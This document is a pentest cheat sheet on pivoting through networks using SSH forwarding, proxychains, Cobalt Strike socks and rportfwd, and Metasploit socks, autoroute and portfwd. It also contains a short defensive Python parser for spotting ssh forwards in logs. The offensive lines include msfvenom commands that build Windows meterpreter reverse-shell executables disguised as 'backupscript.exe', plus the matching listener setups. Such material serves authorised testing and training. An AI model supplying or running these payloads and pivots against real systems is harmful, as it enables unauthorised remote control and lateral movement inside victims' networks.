Dynamic Port Forwarding (SSH + Socks)
Local Port Forward SSH
It sends the data from <local-port> to <remote-port> on the target server.
# Local Port -> Can be any port
# Remote Port -> The port where the target service is listening on
ssh -L <local-port>:127.0.0.1:<remote-port> <user>@<IP>
# Confirm Port Forwarding
netstat -antp | grep <local-port>
# Forwarding Several Ports
ssh -L <local-port>:localhost:<remote-port> -L <local-port>:localhost:<remote-port> <user>@<IP>
SSH Tunneling over SOCKS Proxy
# SSH Command
ssh -D 1080 <user>@<IP>
# Check Proxychains Conf File
/etc/proxychains.conf
socks4 127.0.0.1 1080
Reverse Port Forwarding SSH
# Generate Reverse Shell, with the IP of the internal host.
msfvenom -p windows/x64/meterpreter/reverse_https lhost=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
# Set lport 8000
# set lhost 127.0.0.1
# Reverse Port Forward
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
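A defender-side view of the three SSH forwarding modes above, as an added example that is not part of the original page: it parses ssh command lines (as collected from process or audit logs) and reports each -L, -R and -D forward, marking those that request a listener beyond loopback. The sample command lines and addresses are constructed; only the TCP forms of the forwarding spec are handled, and -g, -o and ssh_config settings are ignored.

```python
import re
import shlex

# ssh(1) options that consume an argument; every other letter is a boolean flag.
TAKES_ARG = set("BbcDEeFIiJLlmOoPpQRSWw")
FORWARD = {"L": "local", "R": "remote", "D": "dynamic"}
LOOPBACK = {"localhost", "127.0.0.1", "[::1]"}

def classify(kind, spec):
    """Split [bind_address:]port[:host:hostport], keeping [IPv6] literals whole."""
    parts = re.split(r":(?![^\[]*\])", spec)
    has_bind = len(parts) in (2, 4)        # TCP forms only (assumption)
    bind = parts[0] if has_bind else None  # None: no bind address given
    port = parts[1] if has_bind else parts[0]
    exposed = has_bind and bind not in LOOPBACK  # "" or "*" means all interfaces
    return {"kind": kind, "bind": bind, "port": port, "exposed": exposed}

def parse_forwards(cmdline):
    """Return every -L/-R/-D forward requested on one ssh command line."""
    argv = shlex.split(cmdline)
    found, host_seen, i = [], False, 1
    while i < len(argv):
        arg = argv[i]
        i += 1
        if not arg.startswith("-") or len(arg) == 1:
            if host_seen:
                break                      # start of the remote command
            host_seen = True               # ssh also accepts options after the host
            continue
        for j, flag in enumerate(arg[1:], start=2):  # bundled flags: -vN, -NfD1080
            if flag in TAKES_ARG:
                value = arg[j:]
                if not value and i < len(argv):
                    value, i = argv[i], i + 1
                if flag in FORWARD:
                    found.append(classify(FORWARD[flag], value))
                break
    return found

# Constructed process command lines, modelled on the SSH commands above.
SAMPLES = [
    "ssh -L 8080:127.0.0.1:3306 -L 8443:localhost:443 user@192.0.2.10",
    "ssh -D 1080 user@192.0.2.10",
    "ssh -R 10.0.0.5:8080:0.0.0.0:8000 ubuntu@192.0.2.10 -vN",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print([f for f in parse_forwards(line) if f["exposed"]], line)
```

For -R, the server only honours a non-loopback bind address when the GatewayPorts setting in its sshd_config permits it, so a flagged remote forward is a prompt to check that setting on the SSH server.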
Cobalt Tunneling & Port Forwarding
# Socks4 Proxy
socks 1080
# socks5
socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Reverse Port Forward
rportfwd
MSF Socks Proxy
use auxiliary/server/socks_proxy
set srvport 1080
set srvhost 0.0.0.0
set version 4a
# Verify Proxy runs
jobs
Metasploit Autoroute
use post/multi/manage/autoroute
set session <session id>
set subnet <ip>
run
# Shorter Method
run autoroute -s <ip>/24
Metasploit Port Forwarding
portfwd add -l <local-port> -p <remote-port> -r <ip>
Metasploit Reverse Forwarding
portfwd add -R -l <local-port> -p <remote-port> -L <tun0>
# Setup Listener
set payload windows/x64/meterpreter/reverse_tcp
set lport <local-port>
set lhost 0.0.0.0
run
# Create Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<pivot-ip> -f exe -o backupscript.exe LPORT=<remote-port>